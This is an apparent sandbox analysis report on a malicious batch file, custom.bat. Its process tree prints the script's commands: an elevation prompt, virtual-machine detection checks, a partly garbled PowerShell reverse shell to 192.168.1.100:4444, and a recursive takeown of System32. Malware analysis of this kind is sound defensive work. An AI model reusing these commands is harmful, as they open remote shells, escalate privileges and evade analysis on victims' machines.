1b8c1fc80ad13c703485ddb7f6581584e5b538862287266b960f4994549214a3 | Triage

Analysis

max time kernel
31s
max time network
42s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
08-09-2024 06:41

Sharing

Reason

Machine shutdown

Report Analysis Logs

General

Target

custom.bat
Size

2KB
MD5

6482067516f0f24cdc0a596de66c951a
SHA1

9a77d1d6bc48250c98e57af675dec3a2dac51ed8
SHA256

1b8c1fc80ad13c703485ddb7f6581584e5b538862287266b960f4994549214a3
SHA512

25fa1d45b9a10e97cded264824bae7e2d149850d2e0a618b448f434aedee160b7f014dca765aadd501d064e952effe5393d0163dd0cfe1bd8c03de593c037e86

Score

7^/10

discovery execution

Malware Config

Signatures

Modifies file permissions 1 TTPs 1 IoCs

File and Directory Permissions Modification

pid	Process
872	takeown.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Start PowerShell.

PowerShell

pid	Process
4552	powershell.exe
2236	powershell.exe

Gathers system information 1 TTPs 3 IoCs

Runs systeminfo.exe.

System Information Discovery

pid	Process
4512	systeminfo.exe
316	systeminfo.exe
1064	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
4552	powershell.exe
4552	powershell.exe
2236	powershell.exe
2236	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	4552	powershell.exe
Token: SeDebugPrivilege	2236	powershell.exe
Token: SeTakeOwnershipPrivilege	872	takeown.exe

Suspicious use of WriteProcessMemory 22 IoCs

description	pid	Process	procid_target
PID 1824 wrote to memory of 4308	1824	cmd.exe	84
PID 1824 wrote to memory of 4308	1824	cmd.exe	84
PID 4308 wrote to memory of 4552	4308	cmd.exe	86
PID 4308 wrote to memory of 4552	4308	cmd.exe	86
PID 4552 wrote to memory of 1784	4552	powershell.exe	89
PID 4552 wrote to memory of 1784	4552	powershell.exe	89
PID 4308 wrote to memory of 1064	4308	cmd.exe	91
PID 4308 wrote to memory of 1064	4308	cmd.exe	91
PID 4308 wrote to memory of 4660	4308	cmd.exe	92
PID 4308 wrote to memory of 4660	4308	cmd.exe	92
PID 4308 wrote to memory of 4512	4308	cmd.exe	99
PID 4308 wrote to memory of 4512	4308	cmd.exe	99
PID 4308 wrote to memory of 3816	4308	cmd.exe	100
PID 4308 wrote to memory of 3816	4308	cmd.exe	100
PID 4308 wrote to memory of 316	4308	cmd.exe	102
PID 4308 wrote to memory of 316	4308	cmd.exe	102
PID 4308 wrote to memory of 3588	4308	cmd.exe	103
PID 4308 wrote to memory of 3588	4308	cmd.exe	103
PID 4308 wrote to memory of 2236	4308	cmd.exe	105
PID 4308 wrote to memory of 2236	4308	cmd.exe	105
PID 4308 wrote to memory of 872	4308	cmd.exe	106
PID 4308 wrote to memory of 872	4308	cmd.exe	106

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\custom.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1824
- C:\Windows\system32\cmd.exe
  cmd /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4308
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Start-Process cmd -Verb runAs"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4552
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe"
      4⤵
      PID:1784
- - C:\Windows\system32\systeminfo.exe
    systeminfo
    3⤵
    - Gathers system information
    PID:1064
- - C:\Windows\system32\findstr.exe
    findstr /i "VirtualBox"
    3⤵
    PID:4660
- - C:\Windows\system32\systeminfo.exe
    systeminfo
    3⤵
    - Gathers system information
    PID:4512
- - C:\Windows\system32\findstr.exe
    findstr /i "VMware"
    3⤵
    PID:3816
- - C:\Windows\system32\systeminfo.exe
    systeminfo
    3⤵
    - Gathers system information
    PID:316
- - C:\Windows\system32\findstr.exe
    findstr /i "Hyper-V"
    3⤵
    PID:3588
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.100', 4444); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|:ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close()"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2236
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\* /r /d y
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:872

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

PowerShell

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

Credential Access

Discovery

System Information Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
6cf293cb4d80be23433eecf74ddb5503

SHA1
24fe4752df102c2ef492954d6b046cb5512ad408

SHA256
b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

SHA512
0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
d8b9a260789a22d72263ef3bb119108c

SHA1
376a9bd48726f422679f2cd65003442c0b6f6dd5

SHA256
d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc

SHA512
550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_byn531n5.k2u.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/4552-0-0x00007FFABBF33000-0x00007FFABBF35000-memory.dmp

Filesize
8KB

Download
memory/4552-6-0x0000012A7CFA0000-0x0000012A7CFC2000-memory.dmp

Filesize
136KB

Download
memory/4552-11-0x00007FFABBF30000-0x00007FFABC9F1000-memory.dmp

Filesize
10.8MB

Download
memory/4552-12-0x00007FFABBF30000-0x00007FFABC9F1000-memory.dmp

Filesize
10.8MB

Download
memory/4552-15-0x00007FFABBF30000-0x00007FFABC9F1000-memory.dmp

Filesize
10.8MB

Download